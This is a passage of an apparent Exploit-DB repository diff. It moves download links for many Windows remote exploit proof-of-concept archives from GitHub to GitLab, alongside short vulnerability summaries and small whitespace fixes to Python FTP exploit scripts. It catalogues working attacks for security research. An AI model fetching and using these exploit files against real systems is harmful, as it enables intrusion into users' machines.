http://packetstormsecurity.com/files/122865/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27754.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27754.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/27758.txt b/exploits/windows/remote/27758.txt index 51b12e613..1dbd55d0f 100644 --- a/exploits/windows/remote/27758.txt +++ b/exploits/windows/remote/27758.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects UltraISO version 8.0.0. 1392; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27758.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27758.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27759.txt b/exploits/windows/remote/27759.txt index 826b71be8..edb720dd9 100644 --- a/exploits/windows/remote/27759.txt +++ b/exploits/windows/remote/27759.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects MagicISO version 5.0 Build 0166; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27759.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27759.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27760.txt b/exploits/windows/remote/27760.txt index 0644071a6..d9450c356 100644 --- a/exploits/windows/remote/27760.txt +++ b/exploits/windows/remote/27760.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects PowerISO version 2.9; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27760.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27760.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27943.txt b/exploits/windows/remote/27943.txt index 8db2023d2..a08c6319d 100644 --- a/exploits/windows/remote/27943.txt +++ b/exploits/windows/remote/27943.txt @@ -48,7 +48,7 @@ must visit a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/122980/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27943.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27943.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/28189.txt b/exploits/windows/remote/28189.txt index 248e309df..c18e3e537 100644 --- a/exploits/windows/remote/28189.txt +++ b/exploits/windows/remote/28189.txt @@ -10,4 +10,4 @@ Note that Microsoft Office applications include functionality to embed Office fi This issue is distinct from the issue described in BID 18422 (Microsoft Excel Unspecified Remote Code Execution Vulnerability). Proof-of-concept 'Nanika.xls' was originally thought to be related to BID 18422; however, reports indicate that 'Nanika.xls' triggers this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28189.xls \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28189.xls \ No newline at end of file diff --git a/exploits/windows/remote/28331.txt b/exploits/windows/remote/28331.txt index b84f3e3ae..138213c40 100644 --- a/exploits/windows/remote/28331.txt +++ b/exploits/windows/remote/28331.txt @@ -48,7 +48,7 @@ malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/123263/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28331.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28331.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/29171.txt b/exploits/windows/remote/29171.txt index 442a5b545..7c381c179 100644 --- a/exploits/windows/remote/29171.txt +++ b/exploits/windows/remote/29171.txt @@ -4,4 +4,4 @@ Business Objects Crystal Reports XI Professional is prone to a buffer-overflow v An atacker may exploit this issue by enticing a victim user into opening a malicious document file, resulting in the execution of arbitrary code with privileges of the vulnerable application. Failed exploit attemtps will likely result in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29171.rpt \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29171.rpt \ No newline at end of file diff --git a/exploits/windows/remote/29524.txt b/exploits/windows/remote/29524.txt index f0461a4eb..250c30cd5 100644 --- a/exploits/windows/remote/29524.txt +++ b/exploits/windows/remote/29524.txt @@ -6,4 +6,4 @@ Microsoft Word 2000 is confirmed vulnerable to a remote code-execution issue. Ex Note that this issue is distinct from issues described in BID 21589 (Microsoft Word Code Execution Vulnerability), BID 21451 (Microsoft Word Malformed String Remote Code Execution Vulnerability), and BID 21518 (Microsoft Word Malformed Data Structures Code Execution Vulnerability). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29524.doc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29524.doc \ No newline at end of file diff --git a/exploits/windows/remote/29686.txt b/exploits/windows/remote/29686.txt index aad2a96d9..51c7b009f 100644 --- a/exploits/windows/remote/29686.txt +++ b/exploits/windows/remote/29686.txt @@ -4,4 +4,4 @@ Adobe Acrobat and Adobe Reader may allow remote attackers to retrieve the conten Information gathered through a successful exploit of this vulnerability may aid in other attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29686.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29686.zip \ No newline at end of file diff --git a/exploits/windows/remote/29687.py b/exploits/windows/remote/29687.py index 0a48296de..7df950c03 100755 --- a/exploits/windows/remote/29687.py +++ b/exploits/windows/remote/29687.py @@ -57,5 +57,4 @@ else: test=test+1; - print "\n\n\t\t\t[ c0ded by PeTrO ]" - + print "\n\n\t\t\t[ c0ded by PeTrO ]" \ No newline at end of file diff --git a/exploits/windows/remote/29688.txt b/exploits/windows/remote/29688.txt index c8919b731..66844ffbb 100644 --- a/exploits/windows/remote/29688.txt +++ b/exploits/windows/remote/29688.txt @@ -4,4 +4,4 @@ EmbeddedWB Web Browser ActiveX control is prone to a remote code-execution vulne Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of applications using the affected ActiveX control and possibly to compromise affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29688.ocx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29688.ocx \ No newline at end of file diff --git a/exploits/windows/remote/30211.txt b/exploits/windows/remote/30211.txt index f240a7fd8..886fe39d2 100644 --- a/exploits/windows/remote/30211.txt +++ b/exploits/windows/remote/30211.txt @@ -17,7 +17,7 @@ privileges. proof of concept url: http://retrogod.altervista.org/9sg_ejb.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30211.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30211.tgz ~rgod~ diff --git a/exploits/windows/remote/3022.txt b/exploits/windows/remote/3022.txt index f77859306..b8b516971 100644 --- a/exploits/windows/remote/3022.txt +++ b/exploits/windows/remote/3022.txt @@ -2,6 +2,6 @@ # Solar Eclipse # solareclipse at phreedom dot org -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3022.tar.gz (12262006-killbill.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3022.tar.gz (12262006-killbill.tar.gz) # milw0rm.com [2004-03-26] \ No newline at end of file diff --git a/exploits/windows/remote/30537.txt b/exploits/windows/remote/30537.txt index bc598ee48..75274970a 100644 --- a/exploits/windows/remote/30537.txt +++ b/exploits/windows/remote/30537.txt @@ -4,4 +4,4 @@ Microsoft MSN Messenger is prone to a buffer-overflow vulnerability because it f Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will likely result in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30537.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30537.rar \ No newline at end of file diff --git a/exploits/windows/remote/31032.txt b/exploits/windows/remote/31032.txt index 1210ad06b..8de43bbd4 100644 --- a/exploits/windows/remote/31032.txt +++ b/exploits/windows/remote/31032.txt @@ -14,4 +14,4 @@ Earlier versions may be affected as well. UPDATE (January 24, 2008): This issue was originally documented as a denial-of-service issue, but reliable reports suggest that this issue can be exploited to execute arbitrary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31032.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31032.zip \ No newline at end of file diff --git a/exploits/windows/remote/31056.py b/exploits/windows/remote/31056.py index bd31fdaa6..79cbe7fa3 100755 --- a/exploits/windows/remote/31056.py +++ b/exploits/windows/remote/31056.py @@ -330,4 +330,4 @@ while s != "quit": except EOFError: s = "quit" print s - print result(s) + print result(s) \ No newline at end of file diff --git a/exploits/windows/remote/31254.py b/exploits/windows/remote/31254.py index 09e518da3..34cb427f1 100755 --- a/exploits/windows/remote/31254.py +++ b/exploits/windows/remote/31254.py @@ -60,6 +60,4 @@ else: conn.send('ABOR '+sploit+'\r\n') cf = conn.recv(1024) #close connection - conn.close() - - + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/31255.py b/exploits/windows/remote/31255.py index 7bcbe4892..b56f7a4f2 100755 --- a/exploits/windows/remote/31255.py +++ b/exploits/windows/remote/31255.py @@ -60,6 +60,4 @@ else: conn.send('CWD '+sploit+'\r\n') cf = conn.recv(1024) #close connection - conn.close() - - + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/31409.txt b/exploits/windows/remote/31409.txt index c303fa951..bf024f20d 100644 --- a/exploits/windows/remote/31409.txt +++ b/exploits/windows/remote/31409.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code within the context BootManage TFTP Server 1.99 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31409.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31409.zip \ No newline at end of file diff --git a/exploits/windows/remote/31583.txt b/exploits/windows/remote/31583.txt index f880db2cf..b73ebea78 100644 --- a/exploits/windows/remote/31583.txt +++ b/exploits/windows/remote/31583.txt @@ -12,4 +12,4 @@ Microsoft Office 2007 Other products that use the Crypto API provided by Windows may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31583.docx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31583.docx \ No newline at end of file diff --git a/exploits/windows/remote/32339.txt b/exploits/windows/remote/32339.txt index c0476df0e..790df7bec 100644 --- a/exploits/windows/remote/32339.txt +++ b/exploits/windows/remote/32339.txt @@ -8,4 +8,4 @@ Successful exploits may allow attackers to execute arbitrary code within the con Microsoft Organization Chart 2.00,19 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32339.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32339.rar \ No newline at end of file diff --git a/exploits/windows/remote/32699.txt b/exploits/windows/remote/32699.txt index fcb342fa8..2db47255c 100644 --- a/exploits/windows/remote/32699.txt +++ b/exploits/windows/remote/32699.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to port-scan networks inside a victim computer' Google Chrome 1.0.154.36 is affected; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32699.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32699.zip \ No newline at end of file diff --git a/exploits/windows/remote/3274.txt b/exploits/windows/remote/3274.txt index 0a16513cb..ecb3e3671 100644 --- a/exploits/windows/remote/3274.txt +++ b/exploits/windows/remote/3274.txt @@ -21,6 +21,6 @@ download: http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3274.tgz (02062007-raptor_winudf.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3274.tgz (02062007-raptor_winudf.tgz) # milw0rm.com [2007-02-06] \ No newline at end of file diff --git a/exploits/windows/remote/32851.html b/exploits/windows/remote/32851.html index 71ffafaf0..d7bc2b056 100644 --- a/exploits/windows/remote/32851.html +++ b/exploits/windows/remote/32851.html @@ -13,7 +13,7 @@ Generation: c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf - Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32851-AsXploit.as + Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32851-AsXploit.as --> diff --git a/exploits/windows/remote/33024.txt b/exploits/windows/remote/33024.txt index c3233b5e6..43407f7c2 100644 --- a/exploits/windows/remote/33024.txt +++ b/exploits/windows/remote/33024.txt @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a cross-domain information-disclosure vu An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33024.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33024.zip \ No newline at end of file diff --git a/exploits/windows/remote/33071.txt b/exploits/windows/remote/33071.txt index fa7bb2fad..e84ebc405 100644 --- a/exploits/windows/remote/33071.txt +++ b/exploits/windows/remote/33071.txt @@ -8,7 +8,7 @@ # More info on: http://funoverip.net/?p=1685 & https://github.com/funoverip/epowner PoC: -v0.2.1- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33071-2.tar.gz (epowner-0.2.1.zip) +v0.2.1- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33071-2.tar.gz (epowner-0.2.1.zip) ===================================================================================================== INTRODUCTION diff --git a/exploits/windows/remote/33172.txt b/exploits/windows/remote/33172.txt index d9e3054d6..32fe000b3 100644 --- a/exploits/windows/remote/33172.txt +++ b/exploits/windows/remote/33172.txt @@ -6,5 +6,5 @@ An attacker may exploit this issue to execute arbitrary code in the context of t Source Engine 3968 and prior builds are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33172-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33172-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33172-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33172-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/33705.txt b/exploits/windows/remote/33705.txt index ad0da8cb8..765aab64e 100644 --- a/exploits/windows/remote/33705.txt +++ b/exploits/windows/remote/33705.txt @@ -8,4 +8,4 @@ Command On Demand CSS Web Installer ActiveX 1.4.9508.605 is vulnerable; other ve Note: Reports indicate that the vendor no longer supports this product; vendor patches are not expected to be released. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33705.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33705.zip \ No newline at end of file diff --git a/exploits/windows/remote/33712.txt b/exploits/windows/remote/33712.txt index c47f9e3e0..91af66e08 100644 --- a/exploits/windows/remote/33712.txt +++ b/exploits/windows/remote/33712.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th VLC Media Player 1.0.5 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33712.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33712.mp3 \ No newline at end of file diff --git a/exploits/windows/remote/33750.txt b/exploits/windows/remote/33750.txt index 7282307bd..8dc2380fa 100644 --- a/exploits/windows/remote/33750.txt +++ b/exploits/windows/remote/33750.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue by enticing a victim to load help files whe Windows 2000 and XP are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33750.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33750.zip \ No newline at end of file diff --git a/exploits/windows/remote/33964.txt b/exploits/windows/remote/33964.txt index 8dd025d89..f97a316f3 100644 --- a/exploits/windows/remote/33964.txt +++ b/exploits/windows/remote/33964.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to execute arbitrar X-Motor Racing 1.26 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33964.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33964.zip \ No newline at end of file diff --git a/exploits/windows/remote/33980.txt b/exploits/windows/remote/33980.txt index 46702f1d2..86fd83a02 100644 --- a/exploits/windows/remote/33980.txt +++ b/exploits/windows/remote/33980.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to cause applications using the engine to c GEM Engine 2 and GEM Engine 3 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33980.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33980.zip \ No newline at end of file diff --git a/exploits/windows/remote/33981.txt b/exploits/windows/remote/33981.txt index 16dbcdaa9..5b360bce2 100644 --- a/exploits/windows/remote/33981.txt +++ b/exploits/windows/remote/33981.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to cause a denial-of-service condition. GameCore 2.5 is vulnerable; other versions may be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33981.dat \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33981.dat \ No newline at end of file diff --git a/exploits/windows/remote/34143.txt b/exploits/windows/remote/34143.txt index 3a75b564a..7e2b9e6e0 100644 --- a/exploits/windows/remote/34143.txt +++ b/exploits/windows/remote/34143.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th Versions prior to XnView 1.97.5 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34143.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34143.rar \ No newline at end of file diff --git a/exploits/windows/remote/34174.txt b/exploits/windows/remote/34174.txt index adf7f2077..fee130554 100644 --- a/exploits/windows/remote/34174.txt +++ b/exploits/windows/remote/34174.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th Enemy Territory: Quake Wars 1.5.12642.33243 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34174.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34174.zip \ No newline at end of file diff --git a/exploits/windows/remote/34178.txt b/exploits/windows/remote/34178.txt index dfc6928c6..2fa443268 100644 --- a/exploits/windows/remote/34178.txt +++ b/exploits/windows/remote/34178.txt @@ -12,4 +12,4 @@ Quake 4 1.4.2 and prior Doom 3 1.3.1 and prior Prey 1.4 and prior -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34178.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34178.zip \ No newline at end of file diff --git a/exploits/windows/remote/34437.txt b/exploits/windows/remote/34437.txt index ca918a8d9..7a22a3da3 100644 --- a/exploits/windows/remote/34437.txt +++ b/exploits/windows/remote/34437.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to create PDF documents containing forged sig All products conforming to the specification for signing PDF documents are affected by this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34437.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34437.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/34462.txt b/exploits/windows/remote/34462.txt index bf5399baa..c11c3be1e 100644 --- a/exploits/windows/remote/34462.txt +++ b/exploits/windows/remote/34462.txt @@ -4,4 +4,4 @@ The Microsoft Windows implementation of Kerberos is prone to a security-bypass v Successful exploits may allow attackers to gain unauthorized access to affected computers through replay attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34462-2.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34462-2.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/34647.txt b/exploits/windows/remote/34647.txt index f0d2c49c4..fa5d74232 100644 --- a/exploits/windows/remote/34647.txt +++ b/exploits/windows/remote/34647.txt @@ -1,4 +1,4 @@ -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34647.zip (aa0day.zip) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34647.zip (aa0day.zip) The Revenge of the Scammers diff --git a/exploits/windows/remote/35280.txt b/exploits/windows/remote/35280.txt index 9374bba72..dc6997721 100644 --- a/exploits/windows/remote/35280.txt +++ b/exploits/windows/remote/35280.txt @@ -1,5 +1,5 @@ Source: https://github.com/tyranid/ExploitRemotingService -Exploit Database Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35280.zip +Exploit Database Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35280.zip ExploitRemotingService (c) 2014 James Forshaw ============================================= diff --git a/exploits/windows/remote/35434.txt b/exploits/windows/remote/35434.txt index 7d949b8c3..a388c6730 100644 --- a/exploits/windows/remote/35434.txt +++ b/exploits/windows/remote/35434.txt @@ -4,4 +4,4 @@ WebKit is prone to a cross-domain scripting vulnerability because it fails to pr Successfully exploiting this issue will allow attackers to send the content of arbitrary files from the user's system to a remote server controlled by them. This results in disclosure of potentially sensitive information which may aid in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35434.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35434.zip \ No newline at end of file diff --git a/exploits/windows/remote/35560.txt b/exploits/windows/remote/35560.txt index 820da202d..817fdf6d9 100644 --- a/exploits/windows/remote/35560.txt +++ b/exploits/windows/remote/35560.txt @@ -6,6 +6,6 @@ Successfully exploiting these issues allows the attacker to execute arbitrary co InstallerDlg.dll 2.6.0.445 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35560-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35560-2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35560-3.rb \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-3.rb \ No newline at end of file diff --git a/exploits/windows/remote/35573.txt b/exploits/windows/remote/35573.txt index 2db52fbf7..75a1e69af 100644 --- a/exploits/windows/remote/35573.txt +++ b/exploits/windows/remote/35573.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue by enticing an unsuspecting user to open a spec Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35573.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35573.zip \ No newline at end of file diff --git a/exploits/windows/remote/35885.txt b/exploits/windows/remote/35885.txt index 6e3e8cbef..bc1ee3dff 100644 --- a/exploits/windows/remote/35885.txt +++ b/exploits/windows/remote/35885.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary code within the context of Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35885.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35885.zip \ No newline at end of file diff --git a/exploits/windows/remote/35886.txt b/exploits/windows/remote/35886.txt index 79c232a12..0928d0acd 100644 --- a/exploits/windows/remote/35886.txt +++ b/exploits/windows/remote/35886.txt @@ -6,7 +6,7 @@ Attackers may exploit this issue to execute arbitrary code within the context of Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35886.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35886.zip diff --git a/exploits/windows/remote/3634.txt b/exploits/windows/remote/3634.txt index 18ece4b6d..00cc9d20a 100644 --- a/exploits/windows/remote/3634.txt +++ b/exploits/windows/remote/3634.txt @@ -21,6 +21,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) # milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/exploits/windows/remote/3635.txt b/exploits/windows/remote/3635.txt index 2f8ad03bd..f9e19f3c3 100644 --- a/exploits/windows/remote/3635.txt +++ b/exploits/windows/remote/3635.txt @@ -22,6 +22,6 @@ after M$ released patch. greets: used SkyLined's idea of exploitation. tnx to him. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3635.zip (04012007-ani.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3635.zip (04012007-ani.zip) # milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/exploits/windows/remote/3636.txt b/exploits/windows/remote/3636.txt index d5cb12c2b..30a1b1b42 100644 --- a/exploits/windows/remote/3636.txt +++ b/exploits/windows/remote/3636.txt @@ -22,6 +22,6 @@ Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3636.zip (04012007-exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3636.zip (04012007-exp.zip) # milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/exploits/windows/remote/36491.txt b/exploits/windows/remote/36491.txt index b5eb2a424..72eaa5999 100644 --- a/exploits/windows/remote/36491.txt +++ b/exploits/windows/remote/36491.txt @@ -1,6 +1,6 @@ Source: https://github.com/SecurityObscurity/cve-2015-0313 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36491.zip +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36491.zip Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit diff --git a/exploits/windows/remote/3651.txt b/exploits/windows/remote/3651.txt index 6b2ae880e..46647ea73 100644 --- a/exploits/windows/remote/3651.txt +++ b/exploits/windows/remote/3651.txt @@ -10,6 +10,6 @@ # Microsoft for great coding and Amsterdam (BH07 Europe) party #-------------------------------------------------------------------------------- -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3651.tar.gz (04032007-ie_ani.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3651.tar.gz (04032007-ie_ani.tar.gz) # milw0rm.com [2007-04-03] \ No newline at end of file diff --git a/exploits/windows/remote/36542.txt b/exploits/windows/remote/36542.txt index 27810c560..7e358a071 100644 --- a/exploits/windows/remote/36542.txt +++ b/exploits/windows/remote/36542.txt @@ -6,4 +6,4 @@ Successful attacks will allow attackers to execute arbitrary code within the con ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36542.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36542.zip \ No newline at end of file diff --git a/exploits/windows/remote/36546.txt b/exploits/windows/remote/36546.txt index b97ebe6a7..be620d1d2 100644 --- a/exploits/windows/remote/36546.txt +++ b/exploits/windows/remote/36546.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow attackers to execute arbitrary code GreenBrowser 6.0.1002 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36546.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36546.rar \ No newline at end of file diff --git a/exploits/windows/remote/36829.txt b/exploits/windows/remote/36829.txt index db13bf448..2efe93d19 100644 --- a/exploits/windows/remote/36829.txt +++ b/exploits/windows/remote/36829.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow remote attackers to execute arbitrary code or R2/Extreme 1.65 is vulnerable; other versions may also be affected. 